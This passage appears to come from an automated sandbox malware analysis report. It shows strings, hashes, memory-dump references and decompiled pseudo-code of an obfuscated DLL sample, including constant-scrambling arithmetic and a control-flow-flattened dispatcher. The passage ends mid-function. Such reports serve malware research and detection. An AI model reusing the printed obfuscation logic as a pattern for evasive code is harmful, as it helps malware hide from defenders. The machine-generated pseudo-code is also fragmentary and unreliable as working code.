0x00000000
0x00000000
0x00000000
0x0087f75e
0x0087f74b
0x0087f74d
0x00000000

Strings

yWS, xrefs: 0087F2CD
t[, xrefs: 0087F01B
<T, xrefs: 0087F137
yY, xrefs: 0087F270
_s, xrefs: 0087F2E2
y!Nt, xrefs: 0087F2C2
|t, xrefs: 0087F1F8
HA^, xrefs: 0087F126
7b>, xrefs: 0087F4D8
(@, xrefs: 0087F11B

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: f4dc9c5f3b891b16758829ff973eccb610b5e2349ea5242c2f51abb5b7bb54e0
Instruction ID: 689b2db443cf15eaa5828fa90200cacfb7e4bd023088a2291c6274089c2e2aee
Opcode Fuzzy Hash: f4dc9c5f3b891b16758829ff973eccb610b5e2349ea5242c2f51abb5b7bb54e0
Instruction Fuzzy Hash: 620211725083809FD3A8CF25C48AA5BBBE2FBC5358F10891DF2D986261D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0088061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0088061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0086EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x00880624
0x00880627
0x00880629
0x0088062c
0x0088062f
0x00880630
0x00880631
0x00880636
0x0088063d
0x00880644
0x0088064b
0x0088064f
0x00880667
0x0088066a
0x00880671
0x00880678
0x0088067f
0x0088068b
0x0088068e
0x00880695
0x0088069c
0x008806a3
0x008806aa
0x008806b1
0x008806b8
0x008806bf
0x008806c6
0x008806d9
0x008806e5
0x008806eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 008806E5

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 287451cb8689beddeb9ac153246863624c146751727599a0b85fc0049edd843c
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 6C2102B1C01209ABCF14DFA9D94A99EBFB5FB10354F108198E529A6251D3B48B04CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00868636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00868636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				signed int _t1259;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1340;
				signed int _t1341;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1384;
				signed int _t1465;
				signed int _t1466;
				signed int _t1469;
				signed int _t1482;
				signed int _t1495;
				signed int _t1498;
				void* _t1500;
				void* _t1504;
				void* _t1505;
				void* _t1506;

				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1469 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1343 = 0x42;
				_v388 = _v388 / _t1343;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1344 = 0x4a;
				_v516 = _v516 / _t1344;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1465 = 0x6f;
				_t1345 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1465;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1345;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1346 = 0x15;
				_v196 = _v196 / _t1346;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1340 = 0x1c;
				_t1347 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1340;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1347;
				_t1348 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1348;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1349 = 0x59;
				_v540 = _v540 / _t1349;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1495 = 0x5c;
				_v524 = _v524 / _t1495;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1349;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
				_v560 = 0xe19e88;
				_v560 = _v560 | 0xc222c343;
				_v560 = _v560 / _t1465;
				_v560 = _v560 + 0x567c;
				_v560 = _v560 ^ 0x01c941bb;
				_v568 = 0xf463df;
				_v568 = _v568 | 0x401122c6;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0xf3373c61;
				_v568 = _v568 ^ 0xfb38c632;
				_v392 = 0xa88994;
				_v392 = _v392 >> 2;
				_v392 = _v392 + 0xfffffc92;
				_v392 = _v392 ^ 0x002883f3;
				_v544 = 0x16009;
				_v544 = _v544 ^ 0x700f0ae7;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0xffffa581;
				_v544 = _v544 ^ 0xcd57c12d;
				_v400 = 0x4e3251;
				_v400 = _v400 << 0xd;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0x510ef6f0;
				_v408 = 0xce49b4;
				_v408 = _v408 / _t1340;
				_v408 = _v408 | 0xa9ee0ad6;
				_v408 = _v408 ^ 0xa9ed29cd;
				_v368 = 0xfab4ff;
				_v368 = _v368 ^ 0x8bb4f731;
				_v368 = _v368 + 0x4788;
				_v368 = _v368 ^ 0x8b4dbddc;
				_v376 = 0x3b857d;
				_v376 = _v376 + 0xd8be;
				_v376 = _v376 ^ 0x0c7e0de1;
				_v376 = _v376 ^ 0x0c4b703c;
				_v384 = 0x702b67;
				_v384 = _v384 + 0x7016;
				_v384 = _v384 | 0xc6195e9d;
				_v384 = _v384 ^ 0xc67058d5;
				_v536 = 0xd092b2;
				_v536 = _v536 + 0xffff63c4;
				_v536 = _v536 | 0x81cb3080;
				_v536 = _v536 ^ 0x4ecdb7ae;
				_v536 = _v536 ^ 0xcf0bdc69;
				_v248 = 0xf8c39f;
				_v248 = _v248 | 0x0e89bf31;
				_v248 = _v248 ^ 0x0ef3b328;
				_v556 = 0x54f798;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0xd52f7ed0;
				_v556 = _v556 >> 6;
				_v556 = _v556 ^ 0x03531d7d;
				_v672 = 0xe1b7ad;
				_t1350 = 0x7a;
				_v672 = _v672 / _t1350;
				_v672 = _v672 << 0xc;
				_t1351 = 0xa;
				_v672 = _v672 / _t1351;
				_v672 = _v672 ^ 0x02f2c9f1;
				_v676 = 0xf0d76a;
				_v676 = _v676 >> 3;
				_v676 = _v676 + 0xffffb109;
				_v676 = _v676 >> 4;
				_v676 = _v676 ^ 0x0006f826;
				_v200 = 0xd1b71d;
				_t1352 = 0x7c;
				_v200 = _v200 / _t1352;
				_v200 = _v200 ^ 0x0006a6d0;
				_v596 = 0x496d6a;
				_t459 =  &_v596; // 0x496d6a
				_v596 =  *_t459 * 0x6b;
				_v596 = _v596 + 0xbb66;
				_v596 = _v596 + 0xffff602d;
				_v596 = _v596 ^ 0x1ebb8efb;
				_v404 = 0xf3863;
				_v404 = _v404 >> 0xe;
				_t1353 = 0x2a;
				_v404 = _v404 / _t1353;
				_v404 = _v404 ^ 0x00094758;
				_v476 = 0x611fd8;
				_v476 = _v476 | 0xb878f5dc;
				_v476 = _v476 + 0xad5b;
				_v476 = _v476 ^ 0xb87809fa;
				_v460 = 0xcf43a7;
				_v460 = _v460 ^ 0xdec9221b;
				_v460 = _v460 ^ 0xf00bdbd0;
				_v460 = _v460 ^ 0x2e089b39;
				_v340 = 0x6e2519;
				_v340 = _v340 + 0xffff23bc;
				_v340 = _v340 + 0xffffab38;
				_v340 = _v340 ^ 0x00658e81;
				_v468 = 0x6e95b3;
				_v468 = _v468 | 0xe42d871f;
				_v468 = _v468 + 0xffff0334;
				_v468 = _v468 ^ 0xe4661c95;
				_v184 = 0x976a3e;
				_v184 = _v184 >> 2;
				_v184 = _v184 ^ 0x002fb3e7;
				_v640 = 0xf929b2;
				_v640 = _v640 >> 4;
				_v640 = _v640 + 0x46ec;
				_t1354 = 0x4e;
				_v640 = _v640 * 0x14;
				_v640 = _v640 ^ 0x013b9ce5;
				_v288 = 0x293a87;
				_v288 = _v288 * 0x1a;
				_v288 = _v288 ^ 0x042f344b;
				_v300 = 0x77766c;
				_v300 = _v300 + 0xffff170c;
				_v300 = _v300 ^ 0x007d4cee;
				_v308 = 0x8e9aa4;
				_v308 = _v308 / _t1354;
				_v308 = _v308 ^ 0x00052c4e;
				_v456 = 0x218ab6;
				_v456 = _v456 / _t1340;
				_v456 = _v456 << 8;
				_v456 = _v456 ^ 0x0138796e;
				_v632 = 0x66de5e;
				_v632 = _v632 + 0xffff10e7;
				_v632 = _v632 << 8;
				_v632 = _v632 + 0xffffeb43;
				_v632 = _v632 ^ 0x65e84e4c;
				_v412 = 0x242a03;
				_v412 = _v412 << 3;
				_v412 = _v412 >> 4;
				_v412 = _v412 ^ 0x00169ab3;
				_v580 = 0x395796;
				_v580 = _v580 << 7;
				_v580 = _v580 >> 9;
				_v580 = _v580 + 0xb065;
				_v580 = _v580 ^ 0x000e083d;
				_v192 = 0xd019c8;
				_t1355 = 0x29;
				_v192 = _v192 / _t1355;
				_v192 = _v192 ^ 0x000d0418;
				_v364 = 0x5114b6;
				_v364 = _v364 << 9;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0xb6040cfd;
				_v452 = 0xdc8bb5;
				_v452 = _v452 ^ 0xb07e6e5f;
				_v452 = _v452 << 0xe;
				_v452 = _v452 ^ 0xb9795724;
				_v572 = 0xdefa33;
				_v572 = _v572 + 0xae39;
				_t1356 = 0x16;
				_v572 = _v572 * 0x56;
				_v572 = _v572 * 0x33;
				_v572 = _v572 ^ 0xf7eaa6cf;
				_v280 = 0x106c99;
				_v280 = _v280 ^ 0xf1e2e143;
				_v280 = _v280 ^ 0xf1f1647c;
				_v444 = 0x12ba83;
				_v444 = _v444 + 0xffff2e0b;
				_v444 = _v444 | 0x954218b9;
				_v444 = _v444 ^ 0x95501631;
				_v636 = 0x6f6552;
				_v636 = _v636 * 0x3a;
				_v636 = _v636 * 0x63;
				_v636 = _v636 ^ 0xc29eccb8;
				_v508 = 0x9979f;
				_v508 = _v508 >> 3;
				_v508 = _v508 + 0xffff8ecf;
				_v508 = _v508 ^ 0x0008ebd3;
				_v504 = 0x338317;
				_v504 = _v504 + 0xffff3917;
				_v504 = _v504 >> 1;
				_v504 = _v504 ^ 0x001e4512;
				_v420 = 0x2775fd;
				_v420 = _v420 / _t1356;
				_v420 = _v420 | 0x1f6013d3;
				_v420 = _v420 ^ 0x1f654eff;
				_v656 = 0x7dcf58;
				_v656 = _v656 ^ 0x77b5ed19;
				_v656 = _v656 + 0x312f;
				_v656 = _v656 << 0xe;
				_v656 = _v656 ^ 0x14d47f34;
				_v488 = 0x685995;
				_v488 = _v488 >> 9;
				_v488 = _v488 + 0xe674;
				_v488 = _v488 ^ 0x000367d5;
				_v328 = 0x4f2a8a;
				_t1357 = 0x30;
				_v328 = _v328 * 0x6c;
				_v328 = _v328 ^ 0x2165dbb2;
				_v664 = 0xf8ddee;
				_v664 = _v664 + 0xffffc10e;
				_v664 = _v664 + 0x5798;
				_v664 = _v664 | 0xdb7e095f;
				_v664 = _v664 ^ 0xdbfa1ad3;
				_v616 = 0xdf2722;
				_v616 = _v616 << 0x10;
				_v616 = _v616 << 0xf;
				_v616 = _v616 << 5;
				_v616 = _v616 ^ 0x0003a7ab;
				_v284 = 0x367b22;
				_t693 =  &_v284; // 0x367b22
				_v284 =  *_t693 / _t1357;
				_v284 = _v284 ^ 0x00041d99;
				_v292 = 0xfb329f;
				_v292 = _v292 + 0xffffce68;
				_v292 = _v292 ^ 0x00fc3f30;
				_v624 = 0xe6983f;
				_v624 = _v624 * 0x70;
				_v624 = _v624 ^ 0x3704df59;
				_v624 = _v624 * 9;
				_v624 = _v624 ^ 0xf3155be5;
				_v260 = 0xc363a2;
				_v260 = _v260 ^ 0x1025f5e4;
				_v260 = _v260 ^ 0x10ec772f;
				_v268 = 0x606a55;
				_v268 = _v268 >> 3;
				_v268 = _v268 ^ 0x000fc817;
				_v600 = 0xd902a;
				_v600 = _v600 >> 0xb;
				_v600 = _v600 << 1;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x00039c6b;
				_v276 = 0xc6f76b;
				_v276 = _v276 + 0xc129;
				_v276 = _v276 ^ 0x00cee0d7;
				_v440 = 0x65c4cc;
				_v440 = _v440 ^ 0xf07a0639;
				_t1358 = 0x69;
				_v440 = _v440 * 0x5f;
				_v440 = _v440 ^ 0x1bc0a904;
				_v584 = 0x39d860;
				_v584 = _v584 * 0x58;
				_v584 = _v584 + 0x4905;
				_v584 = _v584 * 0x2a;
				_v584 = _v584 ^ 0x432fbf1f;
				_v448 = 0xf8616a;
				_v448 = _v448 >> 4;
				_v448 = _v448 + 0xfd7e;
				_v448 = _v448 ^ 0x0010392b;
				_v244 = 0x3f99e5;
				_v244 = _v244 | 0x57277205;
				_v244 = _v244 ^ 0x57370e4e;
				_v348 = 0xf9a67d;
				_v348 = _v348 + 0xffff1738;
				_v348 = _v348 + 0xa0df;
				_v348 = _v348 ^ 0x00f7be80;
				_v564 = 0x164474;
				_v564 = _v564 + 0xffff8d5e;
				_v564 = _v564 | 0xc2a179fa;
				_v564 = _v564 / _t1358;
				_v564 = _v564 ^ 0x01d1c3a4;
				_v668 = 0xe03ad;
				_v668 = _v668 + 0xffffcc8a;
				_t1359 = 0x3c;
				_v668 = _v668 / _t1359;
				_v668 = _v668 | 0xd2e9204d;
				_v668 = _v668 ^ 0xd2e45507;
				_v532 = 0xe9adcf;
				_v532 = _v532 + 0xffffcf22;
				_v532 = _v532 + 0xfffffe50;
				_t1360 = 0x7b;
				_v532 = _v532 / _t1360;
				_v532 = _v532 ^ 0x000617c2;
				_v204 = 0x5a4d2e;
				_v204 = _v204 + 0xffff4d75;
				_v204 = _v204 ^ 0x00531e36;
				_v224 = 0xf2d317;
				_v224 = _v224 * 3;
				_v224 = _v224 ^ 0x02d347bf;
				_v644 = 0xc36dbf;
				_v644 = _v644 + 0xffff71a3;
				_v644 = _v644 | 0x544094bf;
				_v644 = _v644 + 0x4309;
				_v644 = _v644 ^ 0x54c28134;
				_v296 = 0xcf1d90;
				_v296 = _v296 | 0x31ca05e0;
				_v296 = _v296 ^ 0x31c90339;
				_v588 = 0xc34a2d;
				_v588 = _v588 >> 8;
				_v588 = _v588 >> 4;
				_v588 = _v588 + 0x75c1;
				_v588 = _v588 ^ 0x000d315f;
				_v240 = 0xeb7d33;
				_v240 = _v240 + 0xffffc753;
				_v240 = _v240 ^ 0x00e8d488;
				_v180 = 0x669bed;
				_v180 = _v180 / _t1495;
				_v180 = _v180 ^ 0x0002c9fb;
				_v496 = 0xfe0b00;
				_v496 = _v496 ^ 0x5fe703de;
				_v496 = _v496 << 6;
				_v496 = _v496 ^ 0xc645a863;
				_v660 = 0x916252;
				_v660 = _v660 >> 3;
				_v660 = _v660 << 0xd;
				_v660 = _v660 + 0xffff7dae;
				_v660 = _v660 ^ 0x458d7e10;
				_v320 = 0x2cf738;
				_v320 = _v320 | 0xc975dcc7;
				_v320 = _v320 ^ 0xc9795cda;
				_v312 = 0xb1d1ee;
				_v312 = _v312 + 0xffff51df;
				_v312 = _v312 ^ 0x00b16bbb;
				_v344 = 0x3e092b;
				_v344 = _v344 >> 2;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xe09a27cb;
				_v352 = 0x68a1a;
				_v352 = _v352 + 0xc791;
				_v352 = _v352 | 0x7642bfae;
				_v352 = _v352 ^ 0x76458494;
				_v512 = 0xe86ea0;
				_v512 = _v512 + 0xf959;
				_v512 = _v512 | 0x4e18ffd8;
				_t1361 = 0x17;
				_v512 = _v512 / _t1361;
				_v512 = _v512 ^ 0x036c12f7;
				_v396 = 0xe760c6;
				_t1362 = 0x26;
				_v396 = _v396 * 0x31;
				_v396 = _v396 * 0x56;
				_v396 = _v396 ^ 0xe1869eee;
				_v316 = 0x7a30c6;
				_v316 = _v316 / _t1362;
				_v316 = _v316 ^ 0x0003103d;
				_v628 = 0x4f3273;
				_t1363 = 0x78;
				_v628 = _v628 / _t1363;
				_v628 = _v628 << 0xa;
				_v628 = _v628 ^ 0x53aad572;
				_v628 = _v628 ^ 0x51090573;
				_v380 = 0x21784b;
				_v380 = _v380 << 7;
				_v380 = _v380 << 9;
				_v380 = _v380 ^ 0x784b0fa0;
				_v428 = 0xd8c839;
				_v428 = _v428 + 0x77d0;
				_v428 = _v428 >> 2;
				_v428 = _v428 ^ 0x00364f42;
				_v324 = 0x188352;
				_v324 = _v324 + 0xffffa07e;
				_v324 = _v324 ^ 0x00159870;
				_v252 = 0xe98be6;
				_v252 = _v252 >> 2;
				_v252 = _v252 ^ 0x0037d959;
				_v480 = 0xa4f1f5;
				_t1364 = 0x59;
				_t1466 = _v500;
				_v480 = _v480 / _t1364;
				_v480 = _v480 + 0xffff7faf;
				_v480 = _v480 ^ 0x000fae01;
				_v592 = 0x82c23d;
				_v592 = _v592 + 0x5741;
				_v592 = _v592 ^ 0x9a18022a;
				_v592 = _v592 << 0x10;
				_v592 = _v592 ^ 0x1b5af420;
				_v424 = 0x341aa7;
				_v424 = _v424 | 0xfb8ffeba;
				_v424 = _v424 ^ 0xfbbf8b8f;
				_v432 = 0xf44743;
				_t1365 = 0x76;
				_t1341 = _v500;
				_v432 = _v432 / _t1365;
				_v432 = _v432 / _t1365;
				_v432 = _v432 ^ 0x0000ee1d;
				goto L1;
				do {
					while(1) {
						L1:
						_t1504 = _t1469 - 0x856f9ca;
						if(_t1504 <= 0) {
						}
						L2:
						if(_t1504 == 0) {
							_t1259 = E008727F9();
							L113:
							return _t1259;
						}
						_t1505 = _t1469 - 0x39ddd07;
						if(_t1505 > 0) {
							__eflags = _t1469 - 0x5c221fd;
							if(__eflags > 0) {
								__eflags = _t1469 - 0x627e178;
								if(_t1469 == 0x627e178) {
									_t1259 = E00882009();
									_t1469 = 0xa51fadb;
									while(1) {
										L1:
										_t1504 = _t1469 - 0x856f9ca;
										if(_t1504 <= 0) {
										}
										goto L54;
									}
									goto L2;
								}
								__eflags = _t1469 - 0x6362904;
								if(_t1469 == 0x6362904) {
									_t1259 = E00864B5D();
									_t1469 = 0x223c7a9;
									continue;
								}
								__eflags = _t1469 - 0x7a1cd5a;
								if(_t1469 == 0x7a1cd5a) {
									E0087E955();
									_t1259 = E0087D111();
									asm("sbb esi, esi");
									_t1469 = ( ~_t1259 & 0x02cd2b2b) + 0x6362904;
									continue;
								}
								__eflags = _t1469 - 0x8488c7d;
								if(_t1469 != 0x8488c7d) {
									break;
								}
								_t1259 = E0086DE74();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x060e21f6) + 0x19bf82;
								continue;
							}
							if(__eflags == 0) {
								_t1259 = E00873EAA();
								asm("sbb esi, esi");
								_t1482 =  ~_t1259 & 0xf8bf9ea4;
								L21:
								_t1469 = _t1482 + 0x9642905;
								continue;
							}
							__eflags = _t1469 - 0x41f7676;
							if(__eflags == 0) {
								_t1259 = E0086BDF9(__eflags);
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x22d34a3;
								continue;
							}
							__eflags = _t1469 - 0x4c22f24;
							if(_t1469 == 0x4c22f24) {
								_t1259 = E0087D1BC( &_v152, _v628, _v572, _v280, _v444,  &_v160, _v636, E0086A40E());
								_t1500 = _t1500 + 0x18;
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x068737c2) + 0x4c22f24;
								continue;
							}
							__eflags = _t1469 - 0x4d97dbc;
